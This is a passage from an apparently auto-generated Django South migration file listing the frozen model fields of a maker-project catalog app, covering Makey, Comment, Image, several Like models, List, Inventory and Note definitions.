'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'url_snippet': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'})
},
'catalog.cfistoreitem': {
'Meta': {'object_name': 'CfiStoreItem'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'item': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['catalog.Product']", 'unique': 'True'}),
'likers': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'cfi_store_item_likes'", 'symmetrical': 'False', 'through': "orm['catalog.LikeCfiStoreItem']", 'to': u"orm['auth.User']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.collection': {
'Meta': {'object_name': 'Collection'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makeys': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'collections'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Makey']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.comment': {
'Meta': {'ordering': "['-added_time']", 'object_name': 'Comment'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'answer': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comments'", 'null': 'True', 'to': "orm['catalog.Answer']"}),
'body': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comments'", 'null': 'True', 'to': "orm['catalog.Question']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.documentation': {
'Meta': {'object_name': 'Documentation'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '1000'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.emailcollect': {
'Meta': {'object_name': 'EmailCollect'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '30'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'catalog.favoritemakey': {
'Meta': {'unique_together': "(('user', 'makey'),)", 'object_name': 'FavoriteMakey'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.image': {
'Meta': {'object_name': 'Image'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'full_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_s3': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'large_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'small_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'images'", 'null': 'True', 'to': u"orm['auth.User']"})
},
'catalog.instructablestep': {
'Meta': {'ordering': "['-step']", 'object_name': 'InstructableStep'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'body': ('tinymce.models.HTMLField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'iid': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '50', 'null': 'True'}),
'images': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Image']", 'null': 'True', 'blank': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'step': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'default': 'None', 'max_length': '200', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'words': ('django.db.models.fields.IntegerField', [], {'default': '-1'})
},
'catalog.inventory': {
'Meta': {'unique_together': "(('part', 'space'),)", 'object_name': 'Inventory'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'part': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'inventory_part'", 'to': "orm['catalog.Product']"}),
'quantity': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'space': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'inventory_space'", 'to': "orm['catalog.Space']"})
},
'catalog.like': {
'Meta': {'object_name': 'Like'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likearticle': {
'Meta': {'unique_together': "(('user', 'article'),)", 'object_name': 'LikeArticle'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Article']"}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likecfistoreitem': {
'Meta': {'unique_together': "(('user', 'cfi_store_item'),)", 'object_name': 'LikeCfiStoreItem'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'cfi_store_item': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.CfiStoreItem']"}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likechannel': {
'Meta': {'unique_together': "(('user', 'channel'),)", 'object_name': 'LikeChannel'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'channel': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ArticleTag']"}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likecomment': {
'Meta': {'unique_together': "(('user', 'comment'),)", 'object_name': 'LikeComment'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Comment']"}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likeimage': {
'Meta': {'unique_together': "(('user', 'image'),)", 'object_name': 'LikeImage'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Image']"}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likelisting': {
'Meta': {'unique_together': "(('user', 'listing'),)", 'object_name': 'LikeListing'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'listing': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Listing']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likemakey': {
'Meta': {'unique_together': "(('user', 'makey'),)", 'object_name': 'LikeMakey'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'makeylikes'", 'to': "orm['catalog.Makey']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likenote': {
'Meta': {'unique_together': "(('user', 'note'),)", 'object_name': 'LikeNote'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'note': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Note']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likeproduct': {
'Meta': {'unique_together': "(('user', 'product'),)", 'object_name': 'LikeProduct'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likeproductdescription': {
'Meta': {'unique_together': "(('user', 'product_description'),)", 'object_name': 'LikeProductDescription'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product_description': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ProductDescription']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likeproductimage': {
'Meta': {'unique_together': "(('user', 'image'),)", 'object_name': 'LikeProductImage'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ProductImage']"}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likeproducttutorial': {
'Meta': {'unique_together': "(('user', 'tutorial', 'product'),)", 'object_name': 'LikeProductTutorial'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tutorial': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Tutorial']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likeshop': {
'Meta': {'unique_together': "(('user', 'shop'),)", 'object_name': 'LikeShop'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.likevideo': {
'Meta': {'unique_together': "(('user', 'video'),)", 'object_name': 'LikeVideo'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'fb_like_id': ('django.db.models.fields.CharField', [], {'default': "'-1'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'video': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Video']"})
},
'catalog.list': {
'Meta': {'object_name': 'List'},
'access': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'access'", 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_private': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'items': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalog.ListItem']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'owner'", 'to': u"orm['auth.User']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.listgroup': {
'Meta': {'object_name': 'ListGroup'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'lists': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalog.List']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.listing': {
'Meta': {'object_name': 'Listing'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'admins': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'company': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'content': ('tinymce.models.HTMLField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'catalog.listitem': {
'Meta': {'object_name': 'ListItem'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'createdby': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'note': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.location': {
'Meta': {'object_name': 'Location'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.logidenticalproduct': {
'Meta': {'object_name': 'LogIdenticalProduct'},
'added_time': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product1': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'product1'", 'to': "orm['catalog.Product']"}),
'product2': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'product2'", 'to': "orm['catalog.Product']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.makey': {
'Meta': {'unique_together': "(('user', 'slug'),)", 'object_name': 'Makey'},
'about': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'added_time_staff_pick': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'as_part': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'as_makey'", 'null': 'True', 'to': "orm['catalog.Product']"}),
'as_part_new': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'as_makey'", 'null': 'True', 'to': "orm['catalog.NewProduct']"}),
'collaborators': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'collaborators'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'comments': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeycomments'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Comment']"}),
'cover_pic': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Image']", 'null': 'True', 'blank': 'True'}),
'credits': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'derived_from': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'forked_as'", 'null': 'True', 'to': "orm['catalog.Makey']"}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'documentations': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeydocumentations'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Documentation']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'images': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeyimages'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Image']"}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_private': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_staff_pick': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'made_in': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'makeys_made_in'", 'null': 'True', 'to': "orm['catalog.Space']"}),
'mentors': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'modules_used': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'used_in'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Makey']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'new_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeys_parts'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.NewProduct']"}),
'new_tools': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeys_tools'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.NewProduct']"}),
'new_users': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeys'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.NewUser']"}),
'notes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeynotes'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Note']"}),
'removed_collaborators': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makey_removed'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'videos': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeyvideos'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Video']"}),
'votes': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'why': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'catalog.makeyimage': {
'Meta': {'object_name': 'MakeyImage'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey_id': ('django.db.models.fields.IntegerField', [], {}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.newinventory': {
'Meta': {'unique_together': "(('part', 'space'),)", 'object_name': 'NewInventory'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'part': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'new_inventory_part'", 'to': "orm['catalog.NewProduct']"}),
'quantity': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'space': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'new_inventory_space'", 'to': "orm['catalog.Space']"})
},
'catalog.newproduct': {
'Meta': {'object_name': 'NewProduct'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Image']", 'null': 'True', 'blank': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.newuser': {
'Meta': {'object_name': 'NewUser'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.note': {
'Meta': {'ordering': "['order']", 'object_name': 'Note'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'body': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Image']", 'null': 'True', 'blank': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_pending_approval': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
